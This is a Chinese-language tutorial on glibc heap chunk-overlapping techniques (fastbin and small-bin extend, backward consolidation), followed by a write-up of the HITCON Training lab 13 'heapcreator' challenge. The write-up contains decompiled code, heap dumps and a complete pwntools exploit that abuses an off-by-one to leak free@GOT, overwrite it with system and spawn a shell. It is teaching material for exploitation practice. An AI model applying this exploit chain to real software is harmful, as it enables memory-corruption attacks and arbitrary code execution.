Chunk Overlapping

chunk extend 是一种很好理解的利用手法,可以通过修改size或prev_size字段来实现extend,进而越界控制chunk,利用的条件如下:

原理

我们知道chunk几乎都是根据size来进行计算的,这个size类似与偏移的效果,通过加减size来获得前一个或后一个chunk,这一就维护了隐式链表。我们来看几个关键的函数:

获取前一个chunk的函数

/* Size of the chunk below P.  Only valid if !prev_inuse (P).  */
#define prev_size(p) ((p)->mchunk_prev_size)

/* Ptr to previous physical malloc_chunk.  Only valid if !prev_inuse (P).  */
#define prev_chunk(p) ((mchunkptr) (((char *) (p)) - prev_size (p)))

利用当前的chunk地址减去prev_size即可获得前一个chunk的地址

获得next_chunk的函数

/* Get size, ignoring use bits */
#define chunksize(p) (chunksize_nomask (p) & ~(SIZE_BITS))

/* Like chunksize, but do not mask SIZE_BITS.  */
#define chunksize_nomask(p)         ((p)->mchunk_size)

/* Ptr to next physical malloc_chunk. */
#define next_chunk(p) ((mchunkptr) (((char *) (p)) + chunksize (p)))

首先我们可以看到,chunksize一定是8的倍数,因为后三位是三个flag,这里有一个细节一定要注意!!!

32位时 chunk 地址8字节对齐 64位事 chunk 地址16字节对齐

为什么说这个细节十分重要,我们一会儿详细分析一下。这里看到当前chunk加上size即可获得next_chunk。
因此如果我们可以控制size或者prev_size字段,我们就可以越块操作,产生堆块重叠。

fastbin extend

这种方式基本就是通过前一个chunk去控制后一个chunk的size,我们写个demo:

一下代码均为64位环境

int main() {
    int x;
    void *ptr,*ptr1;

    ptr = malloc(0x10);//分配第一个0x10的chunk
    malloc(0x10);//分配第二个0x10的chunk

    *(long long *)((long long)ptr-0x8)=0x41;// 修改第一个块的size域

    free(ptr);
    ptr1 = malloc(0x30);// 实现 extend,控制了第二个块的内容
    return 0;
}

两次malloc执行后,heap分布如下:

0x602000:   0x0000000000000000  0x0000000000000021 <=== chunk 1
0x602010:   0x0000000000000000  0x0000000000000000
0x602020:   0x0000000000000000  0x0000000000000021 <=== chunk 2
0x602030:   0x0000000000000000  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000020fc1 <=== top chunk

之后将chunk1的size修改成0x41,因为0x41恰好可以控制这两个chunk。

注意:这里的size是包含chunk header的

接下来我们free掉chunk1:

0x602000:   0x0000000000000000  0x0000000000000041 <=== 篡改大小
0x602010:   0x0000000000000000  0x0000000000000000
0x602020:   0x0000000000000000  0x0000000000000021
0x602030:   0x0000000000000000  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000020fc1 

执行 free 之后,我们可以看到 chunk2 与 chunk1 合成一个 0x40 大小的 chunk,一起释放了。

Fastbins[idx=0, size=0x10] 0x00
Fastbins[idx=1, size=0x20] 0x00
Fastbins[idx=2, size=0x30]  ←  Chunk(addr=0x602010, size=0x40, flags=PREV_INUSE) 
Fastbins[idx=3, size=0x40] 0x00
Fastbins[idx=4, size=0x50] 0x00
Fastbins[idx=5, size=0x60] 0x00
Fastbins[idx=6, size=0x70] 0x00

之后我们通过 malloc(0x30) 得到 chunk1+chunk2 的块,此时就可以直接控制 chunk2 中的内容,我们也把这种状态称为 overlapping chunk。

这里malloc(0x30)的原因是,我们要将合并的chunk size减去chunk header的size,就是0x40 - 0x10 = 0x30

inuse small bin

与fastbin类似,只是我们需要确保free掉small bin chunk时要避免合并到top chunk。

int main() {
    void *ptr,*ptr1;

    ptr=malloc(0x80);//分配第一个 0x80 的chunk1
    malloc(0x10); //分配第二个 0x10 的chunk2
    malloc(0x10); //防止与top chunk合并

    *(int *)((int)ptr-0x8)=0xb1;
    free(ptr);
    ptr1=malloc(0xa0);
}

在这个例子中,因为分配的 size 不处于 fastbin 的范围,因此在释放时如果与 top chunk 相连会导致和 top chunk 合并。所以我们需要额外分配一个 chunk,把释放的块与 top chunk 隔开。

0x602000:   0x0000000000000000  0x00000000000000b1 <===chunk1 篡改size域
0x602010:   0x0000000000000000  0x0000000000000000
0x602020:   0x0000000000000000  0x0000000000000000
0x602030:   0x0000000000000000  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000000
0x602050:   0x0000000000000000  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000000000
0x602070:   0x0000000000000000  0x0000000000000000
0x602080:   0x0000000000000000  0x0000000000000000
0x602090:   0x0000000000000000  0x0000000000000021 <=== chunk2
0x6020a0:   0x0000000000000000  0x0000000000000000
0x6020b0:   0x0000000000000000  0x0000000000000021 <=== 防止合并的chunk
0x6020c0:   0x0000000000000000  0x0000000000000000
0x6020d0:   0x0000000000000000  0x0000000000020f31 <=== top chunk

释放后,chunk1 把 chunk2 的内容吞并掉并一起置入 unsorted bin

0x602000:   0x0000000000000000  0x00000000000000b1 <=== 被放入unsorted bin
0x602010:   0x00007ffff7dd1b78  0x00007ffff7dd1b78
0x602020:   0x0000000000000000  0x0000000000000000
0x602030:   0x0000000000000000  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000000
0x602050:   0x0000000000000000  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000000000
0x602070:   0x0000000000000000  0x0000000000000000
0x602080:   0x0000000000000000  0x0000000000000000
0x602090:   0x0000000000000000  0x0000000000000021
0x6020a0:   0x0000000000000000  0x0000000000000000
0x6020b0:   0x00000000000000b0  0x0000000000000020 <=== 注意此处标记为空
0x6020c0:   0x0000000000000000  0x0000000000000000
0x6020d0:   0x0000000000000000  0x0000000000020f31 <=== top chunk
[+] unsorted_bins[0]: fw=0x602000, bk=0x602000
 →   Chunk(addr=0x602010, size=0xb0, flags=PREV_INUSE)

再次进行分配的时候就会取回 chunk1 和 chunk2 的空间,此时我们就可以控制 chunk2 中的内容

当然在free状态我们也可以修改small bin,但是不能修改fastbin,因为malloc的时候会对根据对应的size去对应的bin里查找。

向前overlapping

这里展示通过修改 pre_inuse 域和 pre_size 域实现合并前面的块

int main(void) {
    void *ptr1,*ptr2,*ptr3,*ptr4;
    ptr1=malloc(128);//smallbin1
    ptr2=malloc(0x10);//fastbin1
    ptr3=malloc(0x10);//fastbin2
    ptr4=malloc(128);//smallbin2
    malloc(0x10);//防止与top合并
    free(ptr1);
    *(int *)((long long)ptr4-0x8)=0x90;//修改pre_inuse域
    *(int *)((long long)ptr4-0x10)=0xd0;//修改pre_size域
    free(ptr4);//unlink进行前向extend
    malloc(0x150);//占位块
}

前向 extend 利用了 smallbin 的 unlink 机制,通过修改 pre_size 域可以跨越多个 chunk 进行合并实现 overlapping。

接下来我们看个例子:

HITCON Trainging lab 13

root@Aurora:/home/code/pwn/Just-pwn/practice/heap/off-by-one/hitcon_training13(master⚡) #checksec heapcreator 
[*] '/home/code/pwn/Just-pwn/practice/heap/off-by-one/hitcon_training13/heapcreator'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE

全局维护一个heaparray[10],可以存放10个地址。 这个大概的功能如下:

create

根据用户的输入新建chunk,然后设置内容,代码如下:

unsigned __int64 create_heap()
{
  _QWORD *v0; // rbx
  signed int i; // [rsp+4h] [rbp-2Ch]
  size_t size; // [rsp+8h] [rbp-28h]
  char buf; // [rsp+10h] [rbp-20h]
  unsigned __int64 v5; // [rsp+18h] [rbp-18h]

  v5 = __readfsqword(0x28u);
  for ( i = 0; i <= 9; ++i )
  {
    if ( !heaparray[i] )
    {
      heaparray[i] = malloc(0x10uLL);   // 首先分配0x10
      if ( !heaparray[i] )
      {
        puts("Allocate Error");
        exit(1);
      }
      printf("Size of Heap : ");
      read(0, &buf, 8uLL);
      size = atoi(&buf);
      v0 = heaparray[i];
      v0[1] = malloc(size); // 根据用户的输入分配空间,将地址存入heaparray[i][1]
      if ( !*((_QWORD *)heaparray[i] + 1) )
      {
        puts("Allocate Error");
        exit(2);
      }
      *(_QWORD *)heaparray[i] = size;   // 将size存入heaparray[i][0]
      printf("Content of heap:", &buf);
      read_input(*((void **)heaparray[i] + 1), size); // 向content输入
      puts("SuccessFul");
      return __readfsqword(0x28u) ^ v5;
    }
  }
  return __readfsqword(0x28u) ^ v5;
}

我们可以看到这个时候其实分配了两个chunk:

+----------+
+   size   +
+----------+
+   addr   +------->+----------+
+----------+        +  content +
                    +----------+

但是由于两次malloc是连着的,所以实际的结构应该是:

+-----------+
+ prev_size +
+-----------+
+  ch_size  +   // chunk的size
+-----------+
+   size    +
+-----------+
+   addr    +--------|
+-----------+        |
+ prev_size +        |
+-----------+        |
+  ch_size  +        |
+-----------+<-------|
+  content  +
+   .....   +
.           .
.           .
.           .
+-----------+

因此,假如我们可以控制ch_size,我们就可以越界写。

edit

编辑堆,根据指定的索引以及之前存储的堆的大小读取指定内容,但是这里读入的长度会比之前大 1,所以会存在 off by one 的漏洞。

unsigned __int64 edit_heap()
{
  int v1; // [rsp+Ch] [rbp-14h]
  char buf; // [rsp+10h] [rbp-10h]
  unsigned __int64 v3; // [rsp+18h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  printf("Index :");
  read(0, &buf, 4uLL);
  v1 = atoi(&buf);
  if ( v1 < 0 || v1 > 9 )
  {
    puts("Out of bound!");
    _exit(0);
  }
  if ( heaparray[v1] )
  {
    printf("Content of heap : ", &buf);
    read_input(*((void **)heaparray[v1] + 1), *(_QWORD *)heaparray[v1] + 1LL);
    puts("Done !");
  }
  else
  {
    puts("No such heap !");
  }
  return __readfsqword(0x28u) ^ v3;
}

show

展示堆,输出指定索引堆的大小以及内容。

unsigned __int64 show_heap()
{
  int v1; // [rsp+Ch] [rbp-14h]
  char buf; // [rsp+10h] [rbp-10h]
  unsigned __int64 v3; // [rsp+18h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  printf("Index :");
  read(0, &buf, 4uLL);
  v1 = atoi(&buf);
  if ( v1 < 0 || v1 > 9 )
  {
    puts("Out of bound!");
    _exit(0);
  }
  if ( heaparray[v1] )
  {
    printf("Size : %ld\nContent : %s\n", *(_QWORD *)heaparray[v1], *((_QWORD *)heaparray[v1] + 1));
    puts("Done !");
  }
  else
  {
    puts("No such heap !");
  }
  return __readfsqword(0x28u) ^ v3;
}

delete

删除堆,删除指定堆,并且将对应指针设置为了 NULL。

unsigned __int64 delete_heap()
{
  int v1; // [rsp+Ch] [rbp-14h]
  char buf; // [rsp+10h] [rbp-10h]
  unsigned __int64 v3; // [rsp+18h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  printf("Index :");
  read(0, &buf, 4uLL);
  v1 = atoi(&buf);
  if ( v1 < 0 || v1 > 9 )
  {
    puts("Out of bound!");
    _exit(0);
  }
  if ( heaparray[v1] )
  {
    free(*((void **)heaparray[v1] + 1));
    free(heaparray[v1]);
    heaparray[v1] = 0LL;
    puts("Done !");
  }
  else
  {
    puts("No such heap !");
  }
  return __readfsqword(0x28u) ^ v3;
}

于是我们的大概思路如下:

我的脚本如下:

#!/usr/bin/env python
from pwn import *

elf = ELF("./heapcreator")
libc = ELF("./libc.so.6")
context.log_level = "debug"
sh = process("./heapcreator")

free_got = elf.got['free']
log.success("free_got -> " + hex(free_got))
free_libc_addr = libc.symbols['free']
log.success("free_libc_addr -> " + hex(free_libc_addr))
system_libc_addr = libc.symbols['system']
log.success("system_libc_addr -> " + hex(system_libc_addr))

def create(size, content):
    sh.sendline('1')
    sh.sendline(str(size))
    sh.sendline(str(content))
    sh.recvuntil("SuccessFul")
    log.success("Creat success!")

def edit(index, content):
    sh.sendline('2')
    sh.sendline(str(index))
    sh.sendline(str(content))
    sh.recvuntil("Done !")
    log.success("Edit success!")

def show(index):
    sh.sendline('3')
    sh.sendline(str(index))

def delete(index):
    sh.sendline('4')
    sh.sendline(str(index))
    sh.recvuntil("Done !")
    log.success("Delete success!")

if __name__ == "__main__":
    create(0x18,'aaaa')
    create(0x10, 'bbbb')

    content = '/bin/sh\x00' + 'a'*0x10 + "\x41"
    edit(0, content)
    delete(1)

    content = 'deadbeef'*4 + p64(30) + p64(free_got)
    create(0x30,content)
    show(1)
    sh.recvuntil("Content : ")
    free_addr = u64(sh.recv(6).ljust(8, '\x00'))
    log.success("free_addr -> " + hex(free_addr))

    offset = free_addr - free_libc_addr
    system_addr = offset + system_libc_addr

    edit(1,p64(system_addr))
    delete(0)

    sh.interactive()

这里我们来分析一下这个脚本,首先create了一个0x18的size,这个有什么讲究吗?
答案是显然的,上面我们提到64位时,chunk地址是16字节对齐的,因此我们需要对其调试来确定第一个chunk的size。假如我们申请0x10的size,则heap是这样的:

pwndbg> heap
0x603000 PREV_INUSE {
  mchunk_prev_size = 0, 
  mchunk_size = 657, 
  fd = 0x0, 
  bk = 0x0, 
  fd_nextsize = 0x0, 
  bk_nextsize = 0x0
}
0x603290 FASTBIN {
  mchunk_prev_size = 0, 
  mchunk_size = 33, 
  fd = 0x10, 
  bk = 0x6032c0, 
  fd_nextsize = 0x0, 
  bk_nextsize = 0x21
}
0x6032b0 FASTBIN {           // chunk1
  mchunk_prev_size = 0, 
  mchunk_size = 33, 
  fd = 0x6161616161616161, 
  bk = 0x6262626262626262, 
  fd_nextsize = 0x0, 
  bk_nextsize = 0x20d31
}
0x6032d0 PREV_INUSE {        // chunk2
  mchunk_prev_size = 0, 
  mchunk_size = 134449, 
  fd = 0x0, 
  bk = 0x0, 
  fd_nextsize = 0x0, 
  bk_nextsize = 0x0
}
pwndbg> x/20xg 0x603290
0x603290:       0x0000000000000000      0x0000000000000021
0x6032a0:       0x0000000000000010      0x00000000006032c0
0x6032b0:       0x0000000000000000      0x0000000000000021
0x6032c0:       0x6161616161616161      0x6262626262626262
0x6032d0:       0x0000000000000000      0x0000000000020d31
0x6032e0:       0x0000000000000000      0x0000000000000000

由于16字节对齐的缘故,导致chunk1并没用占用chunk2的prev_size字段,所以我们也就没法通过off-by-one的漏洞覆盖到size字段。曾经这个细节坑了我很久,我也是读源码的时候看到的。
假如我们分配0x18的size,则heap如下:

0x603290 FASTBIN {
  mchunk_prev_size = 0, 
  mchunk_size = 33, 
  fd = 0x18, 
  bk = 0x6032c0, 
  fd_nextsize = 0x0, 
  bk_nextsize = 0x21
}
0x6032b0 FASTBIN {
  mchunk_prev_size = 0, 
  mchunk_size = 33, 
  fd = 0x6161616161616161, 
  bk = 0x6262626262626262, 
  fd_nextsize = 0x6363636363636363, 
  bk_nextsize = 0x20d31
}
0x6032d0 PREV_INUSE {
  mchunk_prev_size = 7161677110969590627, 
  mchunk_size = 134449, 
  fd = 0x0, 
  bk = 0x0, 
  fd_nextsize = 0x0, 
  bk_nextsize = 0x0
}
pwndbg> x/20xg 0x603290
0x603290:       0x0000000000000000      0x0000000000000021
0x6032a0:       0x0000000000000018      0x00000000006032c0
0x6032b0:       0x0000000000000000      0x0000000000000021
0x6032c0:       0x6161616161616161      0x6262626262626262
0x6032d0:       0x6363636363636363      0x0000000000020d31
0x6032e0:       0x0000000000000000      0x0000000000000000
0x6032f0:       0x0000000000000000      0x0000000000000000

这时,chunk1已经占用了chunk2的prev_size字段,因此这一步需要调试然后确定size。
然后在chunk1覆盖chunk2的size后,我们重新分配,这是heap如下:

```plain
+-----------+
+ prev_size +
+-----------+
+  ch_size  +   // chunk3的size
+-----------+
+  content  +<-------|
+           +        |
+           +        |
+-----------+        |
+ prev_size +        |
+-----------+        |
+  ch_size  +        |
+-----------+        |         free@got
+   addr    +--------|------->+-----------+
+-----------+                 + free_addr +
                              +-----------+

这里的content是0x30个字节,因此,是可以覆盖到addr的位置的,所以我们把addr修改成free@got,然后泄漏free_addr进而计算offset,然后将其覆盖为system。然后delete掉chunk1直接getshell。
这里比较巧的一个应用是,fastbin被free后进栈,所以addr的chunk会在content下面,这里是十分有意思的一个细节。到此漏洞利用已经基本就完成了。